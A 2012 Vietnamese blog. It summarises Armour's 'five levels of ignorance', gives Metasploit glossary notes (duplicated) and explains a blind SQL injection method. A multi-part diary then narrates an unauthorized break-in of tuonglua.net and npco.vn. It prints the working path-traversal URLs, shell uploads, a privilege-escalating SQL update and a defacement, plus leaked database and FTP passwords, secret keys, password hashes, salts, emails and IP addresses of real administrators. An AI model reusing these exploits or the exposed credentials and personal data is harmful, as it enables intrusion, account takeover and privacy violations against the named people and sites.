Wednesday 30 May 2012
Năm mức ngu dốt
Bài báo Five levels of ignorance ở Communications of the ACM (số 10, năm 2000) của Phillip G. Armour nhìn quá trình phát triển phần mềm như việc nắm bắt tri thức và giảm sự ngu dốt. Lý luận của ông rằng phần mềm là phương tiện thứ năm chứa tri thức rất hay (bốn phương tiện kia là DNA, não, phần cứng các loại, và sách).
Ông chia sự ngu dốt (về vấn đề X nào đó) nói chung, và dốt trong phát triển phần mềm nói riêng ra là năm mức:
0OI – không dốt: để đạt mức này ta phải biết X và chứng minh được rằng ta biết X. Ví dụ: tôi biết viết blog!
1OI – thiếu kiến thức: để … đạt được mức dốt này thì ta phải biết là ta thiếu kiến thức về X. Ví dụ: tôi biết là tôi không biết gì về cơ học lượng tử. Đạt được mức dốt này cũng đã tốt, vì nếu có nhu cầu tôi có thể đi tìm sách vở tài liệu về cơ học lượng tử để học thêm.
2OI – thiếu nhận thức: ở mức dốt này thì ta không biết là ta không biết gì về X. Hiển nhiên là ta không thể cho ví dụ về 2OI nào! Tuy nhiên, thỉnh thoảng đọc sách đọc báo,đọc blog KHMT (!), tôi có thể tìm ra được nhiều thứ chưa bao giờ biết là mình không biết, và như thế tôi chuyển các thứ đó lên 1OI. Dù rằng với cơ học lượng tử nói chung thì tôi ở mức 1OI, chắc chắn là có các đối tượng cụ thể nào đó trong cơ học lượng tử mà tôi ở mức 2OI.
3OI – thiếu quá trình: ở mức dốt này thì ta thiếu một quá trình cụ thể để khám phá ra rằng mình đang không biết rằng mình đang không biết về X. Nói cách khác, ở mức dốt này thì ta không biết cách nào để tìm ra các thứ mà ta không biết rằng ta không biết .
4OI – siêu dốt: chữ này tôi dịch bừa từ chữ meta-ignorance, vì meta-physics người ta dịch là siêu hình (học). Ở mức dốt này thì ta không biết gì về năm mức ngu dốt.
Đến đây thì tôi không còn ở mức 4OI được nữa. (OI viết tắt của Order of Ignorance.)
Dân máy tính thường phải đọc/học rất nhiều để theo kịp sự phát triển với tốc độ ánh sáng của ngành mình. Trong quá trình này, với mỗi vấn đề X của ngành, ta sẽ chuyển dần dần từ 3OI xuống 1OI. Sau đó, nếu X là cái mà ta thật sự thích hoặc cần cho công việc thì sẽ chuyển nó lên 0OI.
Rất nhiều sinh viên và nghiên cứu sinh KHMT ở mức 3OI khi mới bắt đầu đi học. Sau đó họ tìm hiểu về quá trình nghiên cứu, quá trình tìm các vấn đề và hướng nghiên cứu mới, quá trính cập nhật kiến thức về ngành của mình, và chuyển dần các thứ lên 2OI. Để có một quá trình hiệu quả từ 3OI lên 2OI không dễ chút nào. Ví dụ đơn giản: các journals, conference nào trong ngành mình là có giá trị, làm thế nào để tìm đọc các bài trong chúng, phương pháp lọc bài đọc thế nào, vân vân.
Sau khi học được quá trình này rồi, ta có phương tiện để chuyển dần các khối kiến thức khác nhau lên 1OI. Đến khi sắp ra trường, chuẩn bị làm luận án Ph.D về cái gì đó thì (hy vọng rằng) ta đã có vài thứ ở 0OI.
(sưu tầm)
Monday 28 May 2012
Metasploit day-1
Vulnerability - a weakness which allows attacker to break into/ compromise a system's security.
Exploit - code which allows an attacker to take avantage of a vulnerable system
Payload - actual code which runs on the system after exploitation.
Payloads in depth
- singles: self contained payload which do a specific task
- stagers :
required as Singles can not deliver arbitraily large payload depending on exploit.
creates a network connection between attacker and victim
this i used to download Stages payloads
- Stages:
downloaded bby the Stagers and executed
typically do complex tasks like VNC, Meterpreter...
Exploit - code which allows an attacker to take avantage of a vulnerable system
Payload - actual code which runs on the system after exploitation.
Payloads in depth
- singles: self contained payload which do a specific task
- stagers :
required as Singles can not deliver arbitraily large payload depending on exploit.
creates a network connection between attacker and victim
this i used to download Stages payloads
- Stages:
downloaded bby the Stagers and executed
typically do complex tasks like VNC, Meterpreter...
Thursday 10 May 2012
Subqueries (Hacking Exposed Web Application 2011)
Đây là phương pháp theo mình được biết với tên thường gọi là Blind
Injection. Phương pháp này là sự lựa chọn cuối cùng khi ta đã pó tay với các phương
pháp đã dùng.
Blind là gì? Là "mò" :D Không biết thì mới mò chứ :)
Mình sẽ trình bày phương pháp mò có trí tuệ :D
kí tự "a" co mã HEX là 0x61
0x61 & 1 = 1 => 1
0x61 & 2 = 0 => 0
0x61 & 4 = 0 => 0
0x61 & 8 = 0 => 0
0x61 & 16 = 0 => 0
0x61 & 32 = 32 => 1
0x61 & 64 = 64 => 1
0x61 & 128 = 0 =>0
Đọc từ dưới lên ta có: 01100001 =>0x64
Vậy dòng trên nói lên điều gì?
Ta hãy xét một đoạn script sau:
for i = 1 to length(column result);
for p = 0 to 7;
n = 2**p;
AND n IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & n
FROM master.dbo.sysxlogins WHERE name like 0x73006100
OK, khi đoạn script được thực hiện nó sẽ thực hiện các câu querry như sau:
AND 1 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 1
FROM master.dbo.sysxlogins WHERE name like 0x73006100
AND 2 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 2
FROM master.dbo.sysxlogins WHERE name like 0x73006100
AND 3 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 3
FROM master.dbo.sysxlogins WHERE name like 0x73006100
.....
AND 128 IN (SELECT CONVERT(INT,SUBSTRING(column,i,1)) & 128
FROM master.dbo.sysxlogins WHERE name like 0x73006100
Chúng ta sẽ dựa vào kết quả trả về cho từng câu querry là TRUE hay FALSE để
xác định từng chữ cái :D
Friday 4 May 2012
tuonglua.net truyền kì
Phần 1:
15h30 4/5/2012 trời nắng nóng oi vãi.
Dm, hôm bữa check site nbkvl.edu.vn, mình có lên google search vài cách tấn công vào joomla. Vô tình ghé vào tuonglua.net down cái video về mà coi dell được.
Tức quá hôm nay ngồi down lại cái link vl đó. Mình phát hiện một điều thú vị
http://tuonglua.net/plugins/content/jw_allvideos/includes/download.php?file=images/stories/videos/74.flv
Thấy gì đặc biệt hok, mình mới xem LFI gần đây, cũng chưa thực tập nhiều nữa nên hok biết rõ. Chơi nó thử xem sao.
http://tuonglua.net/plugins/content/jw_allvideos/includes/download.php?file=../../../../index.php
=> T_T không được rùi. mình gà quá
Sorry, download unavailable or wrong file path set!Hì, không bỏ cuộc mình mò lại được link.
Please contact the administrator of this site.
Return
http://tuonglua.net/plugins/content/jw_allvideos/includes/download.php?file=images/../index.php
Ôi trời đất ơi. WTF! i got it :)
Giờ thì là file configuration.php
http://tuonglua.net/plugins/content/jw_allvideos/includes/download.php?file=images/../configuration.php
<?phpLàm gì nữa đây :) chưa nghĩ ra nữa, zui qúa đi thôi.
class JConfig {
var $offline = '0';
var $editor = 'fckeditor';
var $list_limit = '20';
var $helpurl = 'http://help.joomla.org';
var $debug = '0';
var $debug_lang = '0';
var $sef = '1';
var $sef_rewrite = '1';
var $sef_suffix = '1';
var $feed_limit = '10';
var $feed_email = 'author';
var $secret = 'iQpzI8w4RTloMje7';
var $gzip = '0';
var $error_reporting = '-1';
var $xmlrpc_server = '0';
var $log_path = 'Z:\\www\\tuonglua\\logs';
var $tmp_path = 'Z:\\www\\tuonglua\\tmp';
var $live_site = '';
var $force_ssl = '1';
var $offset = '7';
var $caching = '1';
var $cachetime = '15';
var $cache_handler = 'file';
var $memcache_settings = array();
var $ftp_enable = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = 'admin';
var $ftp_pass = 'tuonglua';
var $ftp_root = '';
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'adminwebsite';
var $db = 'firewallwebsite';
var $dbprefix = 'tlceh_';
var $mailer = 'mail';
var $mailfrom = 'info@tuonglua.net';
var $fromname = 'Trung Tam An Ninh Mang Firewall';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpsecure = 'none';
var $smtpport = '25';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
var $MetaAuthor = '1';
var $MetaTitle = '1';
var $lifetime = '15';
var $session_handler = 'database';
var $password = 'Rth@ku$$%thE*#K()';
var $sitename = 'Trung Tam An Ninh Mang Firewall';
var $MetaDesc = 'Trung Tam An Ninh Mang Firewall';
var $MetaKeys = 'an ninh mang, anninhmang';
var $offline_message = 'This site is down for maintenance. Please check back again soon.';
}
Phần 2:
8h55 5/5/2012 Mới đi tập thể dục về, tắm xong, mát mẻ cả người
Mở máy online đọc báo trả lời email, haiz, chán. Chưa si nghĩ ra cách nào tấn công nó được hết, sao mình gà thế nhở. Ngồi thử Sqli một buổi mà không dính cái quái gì hết.phế!
Không nản chí. Mình mò zô administrator của nó. Chời, nó chơi kiểu htaccess + htpasswd. Ngon cơm rùi :D
File .htaccess trong /administrator
AuthType Basic
AuthName "EnterPassword"
AuthUserFile /var/www/vhosts/tuonglua.net/httpdocs/administrator/.htpasswd
Require valid-u
Và đây .htpasswd trong /administrator lun
heocon:$apr1$icdAS/..$WLvQtvpKj2IWF4DQXbIỐi. WTF! Lại là cái gì nữa thế. Thế thì chết con người ta à.
Lên google search thôi.
OK, tìm thấy rùi, nhưng cũng không khả quan lắm. Cú pháp như sau:
htpasswd --helpỞ đây bạn heocon sử dụng thêm option -m Force MD5 encryption of the password
Lại thêm một lần nữa chỉ để nhìn chứ không "chơi" được. Haizzzzzzzzzz
Phần 3:
22h00 7/5/2012 Trời mưa cả ngày mát mẻ cực kì luôn.
Hôm nay tâm trạng thoải mái quá. Vừa làm được một điều thú vị.
Tiếp theo đề tài bữa trước, sau vài ngày si nghĩ và tham khảo ý kiến, mình nhận ra một điều là phải local thôi,
Lên http://ip.iuvn.net/ mình tìm được khá nhiều site chung với tuonglua.net.
Hầu hết site nào cũng bị sqli. Mà điên một chỗ là tìm được thì không tìm được link admin, tìm được rùi up shell không được, chó thật :((
Trời không phụ lòng người có dã tâm. hehe
Victim tìm được www.npco.vn => thằng admin này chắc hok phải dân IT, ww.npco.vn/admin admin:123456 cái này viết bằng open source cms core gì gì đó, lỗi cũng không ít, haiz.
Up con shell lên cái coi nào (Giai đoạn này cũng chảy mồ hôi sôi nước mắt chứ hok phải giỡn đâu)
http://npco.vn/upload/multimedia/admin/2012/05/4fa7e2759e078.phpHaha, có shell rùi, connect zô sql thôi, có user/password/database rùi mà
dminwebsite|Rth@ku$$%thE*#K()|firewallwebsiteĐơn giản như đơn giản :D
| 62 | Administrator | orion | backtrackvn@yahoo.com | de0506c5de6021ab6684f376d0a46dc9:U7gkbK4FvYOBtYhZggPRxv9WsgN47lOI | Super Administrator | 0 | 1 | 25 | 2009-08-24 12:30:58 | 2012-04-24 00:48:45 | null | admin_language= language= editor= helpsite= timezone=7 |
Nếu mình không lầm thì mình cần phải có file config trong tuonglua.net/forum nữa để có thể làm admin được.
Mình đoán đúng rùi.hehe
http://tuonglua.net/plugins/content/jw_allvideos/includes/download.php?file=images/../forum/includes/config.phpĐược cái này đây
$config['Database']['dbtype'] = 'mysql';$config['Database']['dbname'] = 'admin_forumnew';$config['MasterServer']['username'] = 'admin_forumnew';$config['MasterServer']['password'] = 'abc@123';Hơi thất vọng, mang tiếng dạy bảo mật mà sao dễ đoán thế nhỉ :D
Một vài anh admin xem chơi
| userid | usergroupid | membergroupids | displaygroupid | username | password | passworddate | styleid | parentemail | homepage | icq | aim | yahoo | msn | skype | showvbcode | showbirthday | usertitle | customtitle | joindate | daysprune | lastvisit | lastactivity | lastpost | lastpostid | posts | reputation | reputationlevelid | timezoneoffset | pmpopup | avatarid | avatarrevision | profilepicrevision | sigpicrevision | options | birthday | birthday_search | maxposts | startofweek | ipaddress | referrerid | languageid | emailstamp | threadedmode | autosubscribe | pmtotal | pmunread | salt | ipoints | infractions | warnings | infractiongroupids | infractiongroupid | adminoptions | profilevisits | friendcount | friendreqcount | vmunreadcount | vmmoderatedcount | socgroupinvitecount | socgroupreqcount | pcunreadcount | pcmoderatedcount | gmmoderatedcount | importuserid | ncode_imageresizer_mode | ncode_imageresizer_maxwidth | ncode_imageresizer_maxheight | assetposthash | fbuserid | fbjoindate | fbname | logintype | fbaccesstoken | bloggroupreqcount | showblogcss | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 277 | 6 | null | 0 | starpham | 998600cf2e22df358a3eb99d35d6726b | 2012-02-25 | dinhtruongstar@yahoo.com | 0 | null | null | null | null | null | null | null | 1 | 0 | <b><font color="#FF0000">Administrator</font></b> | 1 | 1266895980 | 0 | 1336098574 | 1336098574 | 1335406298 | 5971 | 100 | 10 | 5 | 7 | 0 | 0 | 0 | 0 | 0 | 11562327 | 08-14-1986 | 1986-08-14 | -1 | -1 | 118.68.69.198 | 0 | 2 | 0 | 0 | -1 | 1 | 0 | >1uU?J-VAIweICjJ#-]Y&^Rr|yhz& | 0 | 0 | 0 | null | 0 | 0 | 449 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | null | b80bb0beb5aa5f22e61424c3a4288545 | null | 0 | null | vb | null | 0 | 1 |
| 449 | 6 | null | 0 | orion | 231eafee4df3574adbe4391ca40f5e1a | 2011-04-27 | administetua@gmail.com | 0 | null | null | null | null | null | null | null | 1 | 0 | <b><font color="#FF0000">Lionel Messi</font></b> | 1 | 1268119260 | 0 | 1299821099 | 1303909524 | 1286194027 | 0 | 22 | 10 | 5 | 7 | 0 | 0 | 0 | 0 | 0 | 11562071 | null | 0000-00-00 | -1 | -1 | 118.68.63.74 | 0 | 2 | 0 | 0 | -1 | 0 | 0 | 97{ | 0 | 0 | 0 | null | 0 | 0 | 235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | null | null | null | 0 | null | vb | null | 0 | 1 |
| 10418 | 6 | null | 0 | Namboss | 28fd26f10301d8851d02c17a06081d31 | 2011-12-13 | namhoang1991@yahoo.com.vn | 0 | null | null | null | null | null | null | null | 1 | 2 | Administrator | 0 | 1287058440 | 0 | 1336396508 | 1336404384 | 1335324952 | 0 | 3354 | 10 | 5 | 7 | 0 | 0 | 0 | 0 | 0 | 11553879 | null | 0000-00-00 | -1 | -1 | 118.68.70.1 | 0 | 2 | 0 | 0 | -1 | 0 | 0 | !2-$Z-o2xo.KQk%E{Dh7(}sJxo\9#F | 0 | 0 | 0 | null | 0 | 0 | 302 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | null | 8284490cf7740393cb308ccdb697f144 | null | 0 | null | vb | null | 0 | 1 |
| 10486 | 6 | null | 0 | Administrator | 65e428c02be308cd571c4ae413b8d54c | 2012-02-07 | hyvong.group@gmail.com | 0 | null | null | null | null | null | null | null | 2 | 0 | Administrator | 0 | 1291125720 | 0 | 1335616070 | 1335616876 | 1334214825 | 0 | 86 | 10 | 5 | 7 | 0 | 0 | 0 | 0 | 0 | 11554135 | null | 0000-00-00 | -1 | 1 | 115.75.52.182 | 0 | 0 | 0 | 0 | -1 | 0 | 0 | HktsFPtp&Ui#Qs{bD;pe!#B:J0K|Kk | 0 | 0 | 0 | null | 0 | 0 | 204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | null | af155ba3e84aecc8bed64f4e67fb9608 | null | 0 | null | vb | null | 0 | 1 |
1 tiếng rùi. Tạm nghĩ, mai làm tiếp vậy. Sáng mai còn đi tập tạ nữa :))
Phần 4 (kêt thúc):
9h45 8/8/2012 Trời mát dịu nhẹ
Vừa deface tuonglua.net xong.hihi
Show hàng nào
Tiếp tục hôm qua, mình tìm cách up shell lên tuonglua.net
Làm đủ trò trên trời dưới dất up shell via Database hoài mà hok được. Bực mình chuyển zô admincp up.
Mà mấy bạn ấy cũng không vừa. disable cái thằng Administrator có userid =1. Phải mất 1 lúc mình mới nhận ra điều này.
update user set userid=1,usergroupid=6 where username='khoaitay'Cái userid=1 là để chỉ thằng trùm có quyền thêm plugin đó.
Còn usergroupid =6 dùng để cho mình zô nhóm admin zới mấy bạn đó :D
Có quyền rùi thì login vào mà upshell thôi.
| Plugins & Products => Download/Upload Plugins => add thêm con shell xml của mình zô. |
Xong rùi đó. Chỉ cần đổi file index.php lại là xong thôi.
Đến đây là kết thúc rùi. (Đang chờ thằng admin mà kêu hoài nó dell trả lời! chán :D)
Xin chào và hẹn gặp lại trong những truyền kì khác.
Subscribe to:
Posts (Atom)